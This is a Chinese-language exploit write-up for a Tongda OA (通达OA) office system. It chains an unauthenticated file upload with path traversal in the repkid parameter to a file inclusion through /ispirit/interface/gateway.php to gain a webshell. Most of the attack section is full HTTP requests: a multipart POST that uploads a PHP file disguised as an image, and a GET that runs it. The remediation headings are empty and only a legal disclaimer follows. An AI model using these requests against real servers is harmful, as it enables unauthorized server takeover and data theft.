通达OA系统中存在前台任意文件上传漏洞结合文件包含漏洞,可导致攻击者获取服务器权限(GetShell)。这类漏洞通常由于未对用户上传的文件进行充分验证,以及存在不安全的文件包含机制。
漏洞通常出现在以下场景: - 上传功能未验证文件类型或验证可绕过 - 上传路径可预测或可控 - 上传后的文件名未随机化
漏洞通常出现在: - 使用用户可控参数直接包含文件 - 未对包含的文件路径进行限制 - 包含功能未做安全校验
发现上传点
/general/index/UploadFile.php
绕过上传限制
POST /general/index/UploadFile.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./ HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123
------WebKitFormBoundaryABC123
Content-Disposition: form-data; name="FILE1"; filename="test.php"
Content-Type: image/jpeg
<?php phpinfo(); ?>
------WebKitFormBoundaryABC123--
利用文件包含执行上传的恶意文件
GET /general/index/../attachment/nmsl/xxx/xxx/test.php HTTP/1.1
Host: target.com
获取WebShell
文件上传修复
文件包含修复
其他安全措施
某次渗透测试中发现通达OA存在以下漏洞链:
1. 通过/general/index/UploadFile.php
上传WebShell
2. 利用/ispirit/interface/gateway.php
文件包含漏洞包含上传的WebShell
3. 成功获取服务器权限
本文仅用于安全研究和技术交流目的,未经授权对任何系统进行测试或攻击都是非法的。请遵守相关法律法规,仅在获得明确授权的情况下进行安全测试。